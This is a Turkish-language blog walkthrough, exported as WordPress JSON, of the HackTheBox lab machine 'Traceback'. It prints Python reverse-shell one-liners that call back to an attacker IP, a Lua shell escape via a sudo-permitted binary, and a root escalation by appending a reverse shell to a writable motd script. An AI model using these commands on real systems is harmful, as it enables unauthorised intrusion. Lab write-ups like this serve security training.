{"id":1550,"date":"2021-09-12T12:29:03","date_gmt":"2021-09-12T12:29:03","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1550"},"modified":"2021-09-12T12:29:12","modified_gmt":"2021-09-12T12:29:12","slug":"traceback","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/12\/traceback\/","title":{"rendered":"Traceback"},"content":{"rendered":"\n\n\n\n\n
Makine Ad\u0131<\/th>\nSeviye<\/th>\nOS<\/th>\nLogo<\/th>\n<\/tr>\n<\/thead>\n
Traceback<\/a> - HTB<\/td>\nKolay<\/td>\nLinux<\/td>\n\"\"<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Walkthrough<\/h2>\n

nmap taramas\u0131:<\/p>\n

PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)\n|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)\n|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Help us\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
Http'ye gittim ve gobuster ile hi\u00e7 bir \u015fey bulamad\u0131m. Ancak sayfan\u0131n kaynak kodlar\u0131nda \u015f\u00f6yle bir yorum vard\u0131:<\/p>\n
...\n<\/style>\n<\/head>\n<body>\n<center>\n<h1>This site has been owned<\/h1>\n<h2>I have left a backdoor for all the net. FREE INTERNETZZZ<\/h2>\n<h3> - Xh4H - <\/h3>\n<!--Some of the best web shells that you might need ;)-->\n<\/center>\n<\/body>\n...<\/code><\/pre>\n
Bunun \u00fczerine internette web shell'ler ile ilgili aramalar yapmaya ba\u015flad\u0131m. https:\/\/gist.githubusercontent.com\/sbnsec\/352128ea5bd8c95f48d748d5f25e3639\/raw\/a2aeda5d66c4776da4cc5d0736021d7fe54a5332\/webshell-list.txt<\/a> adresindeki wordlist'i kullanarak tekrar bir gobuster denedim.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/Traceback]\n\u2514\u2500# gobuster dir --url http:\/\/10.10.10.181  --add-slash --expanded --follow-redirect --no-error --wordlist webshell-list.txt -t 50| tee gobuster2 \n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.181\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                webshell-list.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/09\/10 13:05:25 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.181\/smevk.php\/           (Status: 200) [Size: 1261]\n\n===============================================================\n2021\/09\/10 13:05:28 Finished\n===============================================================<\/code><\/pre>\n
Bir web shell buldum ve i\u00e7eriye admin:admin<\/code> ile giri\u015f yapt\u0131m.<\/p>\n
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("\/bin\/bash")'<\/code> payload'\u0131 ile kendime reverse ald\u0131m. \u0130\u00e7eride incelemeler yaparken sysadmin kullan\u0131c\u0131s\u0131 haklar\u0131nda \u015fifresiz bir \u015fekilde bir binary kullanabilece\u011fimi g\u00f6rd\u00fcm. Ayn\u0131 zamanda bir not'da buldum.<\/p>\n
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Files inside \/home\/webadmin (limit 20)\ntotal 44\ndrwxr-x--- 5 webadmin sysadmin 4096 Apr 22 06:08 .\ndrwxr-xr-x 4 root     root     4096 Aug 25  2019 ..\n-rw------- 1 webadmin webadmin  105 Mar 16  2020 .bash_history\n-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout\n-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc\ndrwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache\ndrwxrwxr-x 3 webadmin webadmin 4096 Apr 22 06:08 .local\n-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history\n-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile\ndrwxrwxr-x 2 webadmin webadmin 4096 Feb 27  2020 .ssh\n-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16  2020 note.txt<\/code><\/pre>\n
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Checking 'sudo -l', \/etc\/sudoers, and \/etc\/sudoers.d\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#sudo-and-suid\nMatching Defaults entries for webadmin on traceback:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser webadmin may run the following commands on traceback:\n    (sysadmin) NOPASSWD: \/home\/sysadmin\/luvit<\/code><\/pre>\n
webadmin@traceback:\/home\/webadmin$ cat note.txt\ncat note.txt\n- sysadmin -\nI have left a tool to practice Lua.\nI'm sure you know where to find it.\nContact me if you have any question.<\/code><\/pre>\n
Bunun \u00fczerine internette lua ile yaz\u0131lm\u0131\u015f shell kodlar aramaya ba\u015flad\u0131m. Bunu bit dosyaya kaydedip \u00e7al\u0131\u015ft\u0131rd\u0131m.<\/p>\n
webadmin@traceback:\/tmp$ echo "os.execute('\/bin\/sh')" > lua_reverse.lua\necho "os.execute('\/bin\/sh')" > lua_reverse.lua\nwebadmin@traceback:\/tmp$ sudo -u sysadmin \/home\/sysadmin\/luvit -i \/tmp\/lua_reverse.lua\n<sadmin \/home\/sysadmin\/luvit -i \/tmp\/lua_reverse.lua\n$ id\nid\nuid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)\n$ \n<\/code><\/pre>\n
G\u00fczel! \u0130lk flagimizi okuyal\u0131m.<\/p>\n
sysadmin@traceback:~$ ls\nls\ntotal 4336\ndrwxr-x--- 5 sysadmin sysadmin    4096 Mar 16  2020 .\ndrwxr-xr-x 4 root     root        4096 Aug 25  2019 ..\n-rw------- 1 sysadmin sysadmin       1 Aug 25  2019 .bash_history\n-rw-r--r-- 1 sysadmin sysadmin     220 Apr  4  2018 .bash_logout\n-rw-r--r-- 1 sysadmin sysadmin    3771 Apr  4  2018 .bashrc\ndrwx------ 2 sysadmin sysadmin    4096 Aug 25  2019 .cache\ndrwxrwxr-x 3 sysadmin sysadmin    4096 Aug 24  2019 .local\n-rw-r--r-- 1 sysadmin sysadmin     807 Apr  4  2018 .profile\ndrwxr-xr-x 2 root     root        4096 Apr 20 08:40 .ssh\n-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24  2019 luvit\n-rw------- 1 sysadmin sysadmin      33 Sep 11 15:34 user.txt\nsysadmin@traceback:~$ cat user.txt\ncat user.txt\n1876d7894f884e005f1d703b3dd63221<\/code><\/pre>\n
\u0130ncelemeler yapmaya devam ederken \/etc\/update-motd.d\/<\/code> alt\u0131na yazabildi\u011fimi g\u00f6rd\u00fcm.<\/p>\n
\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Interesting GROUP writable files (not in Home) (max 500)\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#writable-files\n  Group sysadmin:\n\/etc\/update-motd.d\/50-motd-news\n\/etc\/update-motd.d\/10-help-text\n\/etc\/update-motd.d\/91-release-upgrade\n\/etc\/update-motd.d\/00-header\n\/etc\/update-motd.d\/80-esm\n\/home\/webadmin\/note.txt\n\/tmp\/linpeas.sh\n\/tmp\/result<\/code><\/pre>\n
ssh ile bir ba\u011flant\u0131 yapt\u0131\u011f\u0131mda banner \u00e7\u0131k\u0131yordu bunu header sayesinde yapuyor. Buraya bir reverse yazd\u0131m ve tekrar ssh att\u0131m. pspy ile inceledi\u011fimde bu s\u00fcre\u00e7lerin root olarak \u00e7al\u0131\u015ft\u0131\u011f\u0131n\u0131 g\u00f6rm\u00fc\u015ft\u00fcm.<\/p>\n
sysadmin@traceback:\/tmp$ echo "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.10.14.18\\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\\"\/bin\/bash\\")'" >> \/etc\/update-motd.d\/00-header<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[\/home\/kali\/Desktop\/HTB]\n\u2514\u2500# ssh sysadmin@10.10.10.181 -i \/root\/.ssh\/id_rsa                                                           130 \u2a2f\n#################################\n-------- OWNED BY XH4H  ---------\n- I guess stuff could have been configured better ^^ -\n#################################<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# nc -lvp 9999                                                                                               1 \u2a2f\nlistening on [any] 9999 ...\n10.10.10.181: inverse host lookup failed: Unknown host\nconnect to [10.10.14.18] from (UNKNOWN) [10.10.10.181] 49408\nroot@traceback:\/# id\nid\nuid=0(root) gid=0(root) groups=0(root)\nroot@traceback:\/# cd \/root\ncd \/root\nroot@traceback:\/root# ls\nls\nroot.txt\nroot@traceback:\/root# cat root.txt\ncat root.txt\nbc51332d9d90cd8f554799e7534fc2f3\nroot@traceback:\/root# <\/code><\/pre>\n
Kolay makine!<\/p>\n","protected":false},"excerpt":{"rendered":"
Makine Ad\u0131 Seviye OS Logo Traceback – HTB Kolay Linux Walkthrough nmap taramas\u0131: PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu…<\/p>\n
Devam\u0131n\u0131 okuTraceback<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1550","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1550","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1550"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1550\/revisions"}],"predecessor-version":[{"id":1552,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1550\/revisions\/1552"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1550"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1550"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1550"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}